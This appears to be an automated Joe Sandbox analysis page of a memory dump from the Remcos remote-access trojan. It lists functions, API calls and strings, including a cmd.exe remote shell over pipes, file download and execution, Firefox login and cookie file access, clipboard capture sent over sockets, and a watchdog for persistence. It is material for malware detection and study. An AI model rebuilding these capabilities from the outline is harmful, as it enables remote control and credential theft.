Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: EventObjectSingleWaitrecv
String ID:
API String ID: 311754179-0
Opcode ID: 027f0035fd30dc323b2ad7daf66a247a767f4e031cde928d6a9ffdf935cc617f
Instruction ID: 1d69a7fd2e689c68354a0251ffa64299bfe08f5f9c70e8df09ea9ad7bb005133
Opcode Fuzzy Hash: 027f0035fd30dc323b2ad7daf66a247a767f4e031cde928d6a9ffdf935cc617f
Instruction Fuzzy Hash: 00F08236108213FFD7059F10EC09E4AFB62FB84721F10862AF510522B08771FC21DBA5

Function 0041B7B6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B7CA

Strings

@, xrefs: 0041B7C0

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: GlobalMemoryStatus
String ID: @
API String ID: 1890195054-2766056989
Opcode ID: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
Instruction ID: 2d2b64c70bc766df394076410504e3f9c8f669937c614d63c6700d8895b1c70c
Opcode Fuzzy Hash: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
Instruction Fuzzy Hash: E6D017B58023189FC720DFA8E804A8DBBFCFB08210F00456AEC49E3700E770E8008B94

Function 0040482D Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000002,00000001,00000006), ref: 00404852
CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E

Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: CreateEventStartupsocket
String ID:
API String ID: 1953588214-0
Opcode ID: afd00016faedd330142d6470bb716eda446324a36170d88fbab64c940495e811
Instruction ID: 7af5cc85a36d800a693892934b5c0b91abe86707509305098cc6d5fca1b6a633
Opcode Fuzzy Hash: afd00016faedd330142d6470bb716eda446324a36170d88fbab64c940495e811
Instruction Fuzzy Hash: 6E0171B1408B809ED7359F38A8456977FE0AB55304F048D6EF1DA97B91D3B5A881CB18

Function 0040165E Relevance: 3.0, APIs: 2, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42a83028ea29ee4520479fdfd1ce509581fbe236408560bbb12e48215694f405
Instruction ID: 20740d68f627359004b4f50e822579efa7e6dd26000e0d34fcfb16e84f8f3500
Opcode Fuzzy Hash: 42a83028ea29ee4520479fdfd1ce509581fbe236408560bbb12e48215694f405
Instruction Fuzzy Hash: 6EF0E2706042015BDB1C8B34CD60B2A36955B84315F288F3FF01AD61E0C73EC8918A0D

Function 0041BA96 Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0041BAB8
GetWindowTextW.USER32(00000000,?,00000100), ref: 0041BACB

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Window$ForegroundText
String ID:
API String ID: 29597999-0
Opcode ID: 3324f64634fda987d6d57ad9b9c1a74d02492aa66b07baf7772615d4eb65d97a
Instruction ID: 4615795adb372a642f3ed3ff298372a60f443b3219566b47796808df054d69ed
Opcode Fuzzy Hash: 3324f64634fda987d6d57ad9b9c1a74d02492aa66b07baf7772615d4eb65d97a
Instruction Fuzzy Hash: CCE0D875A00328A7E720A7A49C4EFE5776CEB08701F0000EEBA18D71C2EAB4AD04C7E4

Function 004118B2 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1bd85037f78227014944570c8e1386f57ec7c93b410e94521ce381e63f7069c
Instruction ID: 7a76c105a712203ac593d2e3a9180375903654e9edbd33c69f6c8f8a5c58a470
Opcode Fuzzy Hash: c1bd85037f78227014944570c8e1386f57ec7c93b410e94521ce381e63f7069c
Instruction Fuzzy Hash: 971123B27201019FD7149B18C890FA6B76AFF51721B59425AE202CB3B2DB30EC91C694

Function 00409DE4 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00409DFD

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: e8998cf28dcd9718db14c62255f57e315091e6a51e3e070f68c79c0d4cc3fbb9
Instruction ID: e6961f6084f98a1e57a9a6385a58e5d20214d93246a99e64d0d6a4ea431d93e1
Opcode Fuzzy Hash: e8998cf28dcd9718db14c62255f57e315091e6a51e3e070f68c79c0d4cc3fbb9
Instruction Fuzzy Hash: 8111C3319002059BCB15EF65E8529EF7BB5EF54318B10013FF406A62E2EFB8AD05CB98

Function 00446137 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
Instruction ID: 4903450aafda00484806ba385278610c2731405ed8485190d5fd86014b6ab98c
Opcode Fuzzy Hash: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
Instruction Fuzzy Hash: 92E0ED3120062577FB2226669D05B5B365D9F033A2F160127EC0AA2283DF7CCC0081EF

Function 0040489E Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,00000000), ref: 004048B3

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
Instruction ID: a24ce82555f98f109a53945ea9c337c8597cdca763f75144b39f195b4e3f482d
Opcode Fuzzy Hash: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
Instruction Fuzzy Hash: 0DD0C9325586088AE620AAB4AD0B8A4775C8312615F0007AA6CA5835D2E6446A19C2AA

Function 004027A7 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

std::_Deallocate.LIBCONCRT ref: 00402E2B

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Deallocatestd::_
String ID:
API String ID: 1323251999-0
Opcode ID: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
Instruction ID: a1ed0c2070530d0d1545540182683da5b3cb4a6c90a46b83737b9b29f97d9faa
Opcode Fuzzy Hash: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
Instruction Fuzzy Hash: FFB092364442007ACA026640AC86F5EB762ABA4710F14C92ABA9A281E2D6B74268A647

Function 00411CA3 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411DE7,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CB3

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
Instruction ID: 079a7b638a28e99b338f4493b6ebfa8105bff269478f0661155a893ef6bf0f7e
Opcode Fuzzy Hash: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
Instruction Fuzzy Hash: 13B00872418382EBCF02DF90DD0492ABAB2BB88741F184C5CB2A14107187228428EB06

Non-executed Functions

Function 0040569A Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 278pipesleepfileCOMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 004056E6

Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36

__Init_thread_footer.LIBCMT ref: 00405723
CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660BC,00000000), ref: 004057B6
CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9

Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776

WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660C0,00000062,004660A4), ref: 004059E4
Sleep.KERNEL32(00000064,00000062,004660A4), ref: 004059FE
TerminateProcess.KERNEL32(00000000), ref: 00405A17
CloseHandle.KERNEL32 ref: 00405A23
CloseHandle.KERNEL32 ref: 00405A2B
CloseHandle.KERNEL32 ref: 00405A3D
CloseHandle.KERNEL32 ref: 00405A45

Strings

0lG, xrefs: 00405954
0lG, xrefs: 00405A2D
SystemDrive, xrefs: 00405761
0lG, xrefs: 0040585A
cmd.exe, xrefs: 0040574D
0lG, xrefs: 004056D0
kG, xrefs: 004057DB
0lG, xrefs: 00405988

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
API String ID: 2994406822-18413064
Opcode ID: 8bdfee77c0bc64ed19f90f7a2553bef14ccf10143dc3843060a054143451180f
Instruction ID: 70e6a120cd26ef4d63fea04585a98dfb86eec3f3f3d93349c630b188a9e88b71
Opcode Fuzzy Hash: 8bdfee77c0bc64ed19f90f7a2553bef14ccf10143dc3843060a054143451180f
Instruction Fuzzy Hash: 8891E471604604AFD711FB36ED42A6F369AEB84308F01443FF989A62E2DB7D9C448B5D

Function 00407C97 Relevance: 34.1, APIs: 10, Strings: 9, Instructions: 835filesleepCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 00407CB9
GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407D87
DeleteFileW.KERNEL32(00000000), ref: 00407DA9

Part of subcall function 0041C291: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
Part of subcall function 0041C291: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371
Part of subcall function 0041C291: FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9

Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00408197
GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00408278
SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084C4
DeleteFileA.KERNEL32(?), ref: 00408652

Part of subcall function 0040880C: __EH_prolog.LIBCMT ref: 00408811
Part of subcall function 0040880C: FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
Part of subcall function 0040880C: __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
Part of subcall function 0040880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF

Sleep.KERNEL32(000007D0), ref: 004086F8
StrToIntA.SHLWAPI(00000000,00000000), ref: 0040873A

Part of subcall function 0041C9E2: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7

Strings

open, xrefs: 00408191
Downloading file: , xrefs: 00407F7D
Browsing directory: , xrefs: 00408238
Unable to delete: , xrefs: 00407E07
Executing file: , xrefs: 004081AD
Deleted file: , xrefs: 00407DC8
Failed to download file: , xrefs: 004080A5
Downloaded file: , xrefs: 0040802E
Unable to rename file!, xrefs: 00408413

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$open
API String ID: 1067849700-1507758755
Opcode ID: 3d68fc61a9f35f776504c00baf08c4de18b1579f627655a32f7a07cf0a426998
Instruction ID: 75e26f7f6c3f3dbd7fc3c9379f58c72dc3a715cd35b24c1fb8b7d51949cc7e38
Opcode Fuzzy Hash: 3d68fc61a9f35f776504c00baf08c4de18b1579f627655a32f7a07cf0a426998
Instruction Fuzzy Hash: FE427F71A043016BC604FB76C95B9AE77A5AF91348F40093FF542671E2EE7C9A08879B

Function 004120F7 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 238threadCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00412106

Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
Part of subcall function 00413877: RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB

OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412146
CloseHandle.KERNEL32(00000000), ref: 00412155
CreateThread.KERNEL32(00000000,00000000,004127EE,00000000,00000000,00000000), ref: 004121AB
OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041241A

Strings

Remcos restarted by watchdog!, xrefs: 00412160
WDH, xrefs: 004121B5, 004121BB, 00412420
\system32\, xrefs: 00412209
\SysWOW64\, xrefs: 00412261
Watchdog module activated, xrefs: 00412184, 004123DC
svchost.exe, xrefs: 004122C5
rmclient.exe, xrefs: 004122EA
WinDir, xrefs: 0041221B, 00412270
fsutil.exe, xrefs: 0041230F
Watchdog launch failed!, xrefs: 00412383

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
API String ID: 3018269243-13974260
Opcode ID: 66080fc72d488257d1ea0b2245dfa7a009f0c22fb4aa4407c274fce46e5546ae
Instruction ID: 8205490d34a3093c97c97cf0412c87f535f0d81ed9353c04b1464aab831027f3
Opcode Fuzzy Hash: 66080fc72d488257d1ea0b2245dfa7a009f0c22fb4aa4407c274fce46e5546ae
Instruction Fuzzy Hash: 2671813160430167C614FB72CD579AE73A4AF90308F50057FB546A61E2FFBC9949C69E

Function 0040BB30 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBAF
FindClose.KERNEL32(00000000), ref: 0040BBC9
FindNextFileA.KERNEL32(00000000,?), ref: 0040BCEC
FindClose.KERNEL32(00000000), ref: 0040BD12

Strings

\AppData\Roaming\Mozilla\Firefox\Profiles\, xrefs: 0040BB52
UserProfile, xrefs: 0040BB60
[Firefox StoredLogins Cleared!], xrefs: 0040BCFF
[Firefox StoredLogins not found], xrefs: 0040BBD4
\logins.json, xrefs: 0040BC34
\key3.db, xrefs: 0040BC76

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Find$CloseFile$FirstNext
String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
API String ID: 1164774033-3681987949
Opcode ID: 8d7aaefdbbb17da70651c85bfc14742a28090f78922c13758640ed364e1dedc2
Instruction ID: 0369a90be492857ee26322cec2c2e6bc6ddf3692cf68474a737f8ca2a3b0d98c
Opcode Fuzzy Hash: 8d7aaefdbbb17da70651c85bfc14742a28090f78922c13758640ed364e1dedc2
Instruction Fuzzy Hash: 13516E3190421A9ADB14F7B2DC56DEEB739AF11304F10057FF406721E2EF785A89CA89

Function 0536758E Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 80clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0536758F
EmptyClipboard.USER32 ref: 0536759D
GlobalAlloc.KERNEL32(00002000,-00000002), ref: 053675BD
GlobalFix.KERNEL32(00000000), ref: 053675C6
GlobalUnWire.KERNEL32(00000000), ref: 053675FC
SetClipboardData.USER32(0000000D,00000000), ref: 05367605
CloseClipboard.USER32 ref: 05367622
OpenClipboard.USER32 ref: 05367629
GetClipboardData.USER32(0000000D), ref: 05367639
GlobalFix.KERNEL32(00000000), ref: 05367642
GlobalUnWire.KERNEL32(00000000), ref: 0536764B
CloseClipboard.USER32 ref: 05367651

Part of subcall function 0535576E: send.WS2_32(?,00000000,00000000,00000000), ref: 05355803

Strings

hdF, xrefs: 05367659
!D@, xrefs: 05367D56

Memory Dump Source

Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd

Yara matches

Similarity

API ID: Clipboard$Global$CloseDataOpenWire$AllocEmptysend
String ID: !D@$hdF
API String ID: 3354723728-3475379602
Opcode ID: 3da19db2da9e38382dfa1a35b9112d29995025b8f82a0e1631b12ced5ccb0bf8
Instruction ID: 96bf700a0c07361ced898d90934385fe81288e8584456d9ade9255efb9beeae2
Opcode Fuzzy Hash: 3da19db2da9e38382dfa1a35b9112d29995025b8f82a0e1631b12ced5ccb0bf8
Instruction Fuzzy Hash: 3C214A76704300DBDB14BBB09C5CEBF36A9AF98652F40582DFC4782191EF248D05CA66

Function 004168C1 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 80clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 004168C2
EmptyClipboard.USER32 ref: 004168D0
GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004168F0
GlobalLock.KERNEL32(00000000), ref: 004168F9
GlobalUnlock.KERNEL32(00000000), ref: 0041692F
SetClipboardData.USER32(0000000D,00000000), ref: 00416938
CloseClipboard.USER32 ref: 00416955
OpenClipboard.USER32 ref: 0041695C
GetClipboardData.USER32(0000000D), ref: 0041696C
GlobalLock.KERNEL32(00000000), ref: 00416975
GlobalUnlock.KERNEL32(00000000), ref: 0041697E
CloseClipboard.USER32 ref: 00416984

Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36

Strings

!D@, xrefs: 00417089

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
String ID: !D@
API String ID: 3520204547-604454484
Opcode ID: 87d49a8bb6f540de46fc3d8776ee09c35eeed2095cf9406eee51325eb26e7f5f
Instruction ID: 9e7c9e91df33a813dd3aefbd505e3631e00017b2d00f6ad0929271c723fa7fba
Opcode Fuzzy Hash: 87d49a8bb6f540de46fc3d8776ee09c35eeed2095cf9406eee51325eb26e7f5f
Instruction Fuzzy Hash: 9F212171604301DBD714BB71DC5DABE36A9AF88746F40043EF946921E2EF3C8D45C66A

Function 0040BD37 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDAF
FindClose.KERNEL32(00000000), ref: 0040BDC9
FindNextFileA.KERNEL32(00000000,?), ref: 0040BE89
FindClose.KERNEL32(00000000), ref: 0040BEAF
FindClose.KERNEL32(00000000), ref: 0040BED0

Strings

\cookies.sqlite, xrefs: 0040BE2C
[Firefox cookies found, cleared!], xrefs: 0040BEDF
\AppData\Roaming\Mozilla\Firefox\Profiles\, xrefs: 0040BD52
UserProfile, xrefs: 0040BD60
[Firefox Cookies not found], xrefs: 0040BDD4, 0040BE9C

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Find$Close$File$FirstNext
String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
API String ID: 3527384056-432212279
Opcode ID: 8f1e00925697bb1ed9065a8a50f8051e558b025f3b3c4185e977bc1ca5524bae
Instruction ID: daa8673b40617291cefb90f55d029d970aaced9502edc59260dc825ad40fac9f
Opcode Fuzzy Hash: 8f1e00925697bb1ed9065a8a50f8051e558b025f3b3c4185e977bc1ca5524bae
Instruction Fuzzy Hash: 38417D3190021AAADB04F7A6DC5A9EEB769DF11704F50017FF506B20D2EF385A46CA9E

Function 004132D2 Relevance: 18.2, APIs: 12, Instructions: 153fileCOMMON

Download Yara Rule

APIs

CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413417
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413425
GetFileSize.KERNEL32(?,00000000), ref: 00413432
UnmapViewOfFile.KERNEL32(00000000), ref: 00413452
CloseHandle.KERNEL32(00000000), ref: 0041345F
CloseHandle.KERNEL32(?), ref: 00413465

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

